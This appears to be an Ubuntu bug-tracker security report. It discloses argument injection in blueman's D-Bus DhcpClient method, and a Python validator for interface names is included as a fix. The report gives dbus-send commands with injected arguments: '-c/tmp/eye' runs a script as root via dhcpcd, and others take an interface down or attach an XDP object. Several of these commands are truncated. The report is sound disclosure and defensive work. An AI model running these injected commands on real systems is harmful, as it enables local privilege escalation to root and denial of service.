Argument Injection leads to Local Privilege Escalation
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
blueman (Ubuntu) | Fix Released | Undecided | Unassigned |
Xenial | Fix Released | Undecided | Unassigned |
Bionic | Fix Released | Undecided | Unassigned |
Focal | Fix Released | Undecided | Unassigned |
Groovy | Fix Released | Undecided | Unassigned |
Bug Description
Hi,
The DhcpClient method of the d-bus interface to blueman-mechanism is prone to an argument injection vulnerability. On systems where the isc-dhcp-client package is removed and the dhcpcd package installed, this leads to Local Privilege Escalation to root from any unprivileged user. See attached Python script for a working exploit. Or use this one-liner with a shell script "/tmp/eye":
dbus-send --print-reply --system --dest=
/org/blueman/
string:"-c/tmp/eye"
This happens because the argument is not sanitized before being used as an argument to dhcpcd.
Also on default installations with isc-dhcp-client installed, this can lead to DoS attacks by bringing any interface down as follows:
dbus-send --print-reply --system --dest=
/org/blueman/
string:"ens33 down al"
Or allows users to attach XDP objects to an interface:
dbus-send --print-reply --system --dest=
/org/blueman/
string:"ens33 down al"
dbus-send --print-reply --system --dest=
/org/blueman/
string:"ens33 name a"
dbus-send --print-reply --system --dest=
/org/blueman/
string:"a xdp o /tmp/o"
Both of these happen because the argument is passed to "ip link" unsanitized.
The fix would be to test if the argument is a valid interface name. But it might also need to check if the user is authorized to alter the given interface. Currently even a call with just the argument "ens33" will allow any unprivileged user to spawn a dhclient process on that interface.
Description: Ubuntu 20.04.1 LTS
Release: 20.04
blueman:
Installed: 2.1.2-1
Candidate: 2.1.2-1
Version table:
*** 2.1.2-1 500
500 http://
100 /var/lib/
Kind regards,
Vaisha Bernard
EYE Control B.V.
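The check the report proposes (confirm the argument is a real interface name before handing it to dhcpcd or ip), as an added illustration that is not blueman's own code: the string must fit the kernel's IFNAMSIZ limit and a conservative character set with no leading `-`, must name an interface present under /sys/class/net (or in a caller-supplied list, used here so the example runs offline), and is then placed as a single argv element after a getopt-style `--` marker. The authorization question the report raises (who may act on a given interface) is a policy decision outside this snippet.

```python
import os
import re
from typing import Iterable, List, Optional

# Linux IFNAMSIZ is 16 bytes including the NUL terminator: 15 usable characters.
IFNAMSIZ = 16
# Allow-list: letters, digits, '.', '_', '-'; never a leading '-', which dhcpcd
# or ip would otherwise parse as an option (the "-c/tmp/eye" case in the report).
_IFACE_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,14}$")


def is_valid_iface_name(name: str) -> bool:
    """Syntactic check only: looks like a kernel interface name, not an option."""
    if not isinstance(name, str) or len(name) >= IFNAMSIZ:
        return False
    return _IFACE_RE.fullmatch(name) is not None


def iface_exists(name: str, known: Optional[Iterable[str]] = None) -> bool:
    """Semantic check: the kernel must actually expose an interface of that name.
    `known` lets callers and tests supply the list instead of reading /sys."""
    if known is None:
        try:
            known = os.listdir("/sys/class/net")  # one entry per interface
        except OSError:
            known = []
    return name in set(known)


def build_dhcp_argv(iface: str, known: Optional[Iterable[str]] = None) -> List[str]:
    """Return the argv a privileged helper may exec, or raise ValueError.
    An argv list (no shell) plus both checks means the D-Bus caller's string can
    only ever occupy the interface slot; it cannot add options or extra words."""
    if not is_valid_iface_name(iface):
        raise ValueError(f"rejected interface argument: {iface!r}")
    if not iface_exists(iface, known):
        raise ValueError(f"no such interface: {iface!r}")
    return ["dhcpcd", "--", iface]  # '--' ends option parsing as defence in depth


def accepts(iface: str, known: Iterable[str]) -> bool:
    """Convenience wrapper: True if the argument would be passed through."""
    try:
        build_dhcp_argv(iface, known)
        return True
    except ValueError:
        return False
```

Against a constructed interface list of `ens33` and `lo`, the plain name `ens33` passes while each of the injected strings from the report is refused before any process is spawned.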
CVE References
Changed in blueman (Ubuntu): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Xenial): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Bionic): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Focal): | |
status: | New → Fix Released |
Changed in blueman (Ubuntu Groovy): | |
status: | New → Fix Released |
information type: | Private Security → Public Security |
Hello Vaisha,
Thank you for the report!
Have you reported this issue to upstream? If not, we encourage you to
report it and keep us in the loop if possible.
Thank you,
Avital